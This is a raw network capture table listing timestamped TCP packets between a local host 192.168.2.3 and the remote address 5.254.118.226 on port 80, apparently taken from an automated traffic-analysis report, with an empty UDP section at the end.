Aug 28, 2021 00:07:10.464941025 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.465260983 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.467602968 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.467787981 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.468923092 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.532466888 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532572031 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532649994 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532705069 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532771111 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532834053 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.532835960 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532892942 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532939911 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.532972097 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.533013105 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.533049107 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.533082962 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.533117056 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.535229921 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.535269022 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.536818027 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.537158966 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.709045887 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.709384918 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.711940050 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.712111950 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.776633978 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.776673079 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.776902914 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.779218912 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.779402971 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.793068886 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.793098927 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.793118000 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.793373108 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.793395996 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.793504000 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.793515921 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.848447084 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.848654032 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.849951982 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.850136995 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.860742092 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.860913038 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.860924006 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.860929012 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.860943079 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.860965967 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.860980034 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.860994101 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.861006975 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.861016035 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.861020088 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.861032009 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.861038923 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.861048937 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.861054897 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.861063004 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.861066103 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.861124039 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.861145020 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.861174107 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.861289978 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.861965895 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.862046957 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.995644093 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.995877028 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:10.999773026 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:10.999984026 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.007513046 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.007761955 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.075508118 CEST	49742	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.075788975 CEST	49751	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.076313019 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.076498985 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.076698065 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.076836109 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.076889038 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.076936960 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.078145027 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.078223944 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.078838110 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.210824013 CEST	80	49751	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.211014032 CEST	49751	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.211735964 CEST	80	49742	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.211950064 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.212763071 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.219141960 CEST	49751	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.219221115 CEST	49751	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.220335960 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.220465899 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.221035004 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.278095961 CEST	80	49751	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.278253078 CEST	49751	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.279861927 CEST	49752	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.287417889 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.287635088 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.287667036 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.287857056 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.287935019 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.353046894 CEST	80	49751	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.353074074 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.353214979 CEST	49752	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.353411913 CEST	49752	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.353526115 CEST	49752	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.372268915 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.372488976 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.372581005 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.372628927 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.372649908 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.417042017 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.417082071 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.417093039 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.417231083 CEST	49752	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.417311907 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.417330027 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.417484999 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.417515039 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.418210983 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.419178009 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.489896059 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.489923954 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.490164042 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.490219116 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.500633001 CEST	80	49752	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.501674891 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.501920938 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.505836964 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.505893946 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.571180105 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.589648008 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.589741945 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.589847088 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.599337101 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.599386930 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.599436998 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.599509954 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.655584097 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.655746937 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.662743092 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.662864923 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.666621923 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.666742086 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.666778088 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.667171955 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.667175055 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.667193890 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.667253971 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.667298079 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.667884111 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.667954922 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.667968035 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.668075085 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.747637987 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.747781992 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.747797012 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.748019934 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.751219034 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.751619101 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.833694935 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.833849907 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.834680080 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.834781885 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:11.997694016 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.999656916 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:11.999780893 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.003201008 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.003261089 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.003395081 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.005498886 CEST	49747	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.008167982 CEST	49754	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.011003971 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.067406893 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.067553043 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.072491884 CEST	80	49747	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.075373888 CEST	80	49754	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.075531006 CEST	49754	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.075746059 CEST	49754	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.075830936 CEST	49754	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.078224897 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.078376055 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.166995049 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.167109013 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.168083906 CEST	80	49754	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.168114901 CEST	80	49754	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.168171883 CEST	49754	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.169610977 CEST	80	49754	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.170015097 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.170243025 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.173868895 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.332623959 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.332766056 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.332977057 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.333096027 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.333542109 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.333663940 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.342925072 CEST	80	49754	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.345549107 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.345662117 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.345788956 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.403776884 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.403812885 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.403846979 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.403942108 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.403965950 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.404022932 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.412772894 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.412925959 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.412934065 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.412955999 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.412996054 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.413150072 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.472887039 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.472929955 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.472970963 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.473026991 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.473040104 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.473052979 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.473149061 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.473176956 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.473184109 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.473166943 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.480292082 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.480516911 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.532639980 CEST	49756	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.550510883 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.550730944 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.550904036 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.551043987 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.553814888 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.554101944 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.554428101 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.554461002 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.554543018 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.554662943 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.554727077 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.554750919 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.700767040 CEST	80	49756	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.701131105 CEST	49756	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.704431057 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.704560995 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.705066919 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.705168962 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.711265087 CEST	49756	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.711333990 CEST	49756	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.751132965 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.751363993 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.768188953 CEST	80	49756	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.768383026 CEST	49756	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.769864082 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.771838903 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772023916 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772056103 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772073984 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772095919 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772156954 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772185087 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772330046 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772444963 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.772629976 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.820890903 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.821100950 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.821890116 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.821923971 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.822088957 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.822187901 CEST	49753	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.824868917 CEST	49758	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.849512100 CEST	80	49757	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.849556923 CEST	80	49756	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.849659920 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.849937916 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.850061893 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.851006985 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.851203918 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.891835928 CEST	80	49758	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.892414093 CEST	49758	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.892453909 CEST	49758	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.892580032 CEST	49758	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.903184891 CEST	80	49753	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.922869921 CEST	80	49757	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.922911882 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.923095942 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.923100948 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:12.923614979 CEST	80	49757	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:12.924029112 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.085800886 CEST	80	49758	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.086085081 CEST	49758	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.087949038 CEST	49759	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.097656012 CEST	80	49757	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.097832918 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.169470072 CEST	80	49759	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.169701099 CEST	49759	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.170063972 CEST	80	49757	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.174312115 CEST	49759	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.174402952 CEST	49759	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.250140905 CEST	80	49759	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.250324011 CEST	49759	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.251868010 CEST	49760	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.258650064 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.258655071 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.258721113 CEST	49758	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.321069956 CEST	80	49760	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.321307898 CEST	49760	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.321449041 CEST	80	49759	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.321655035 CEST	49760	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.322062016 CEST	49760	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.326462984 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.326495886 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.326594114 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.326694012 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.452928066 CEST	80	49755	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.453202963 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.453754902 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.571095943 CEST	49757	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.571199894 CEST	49758	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.742988110 CEST	49760	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.758670092 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.812774897 CEST	80	49760	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.827722073 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.829132080 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.896512032 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.897269964 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:13.977902889 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:13.978112936 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:14.071280956 CEST	49755	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:14.079852104 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:14.079874039 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:14.080180883 CEST	49750	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:14.179433107 CEST	80	49750	5.254.118.226	192.168.2.3
Aug 28, 2021 00:07:14.243072033 CEST	49760	80	192.168.2.3	5.254.118.226
Aug 28, 2021 00:07:14.258650064 CEST	49757	80	192.168.2.3	5.254.118.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
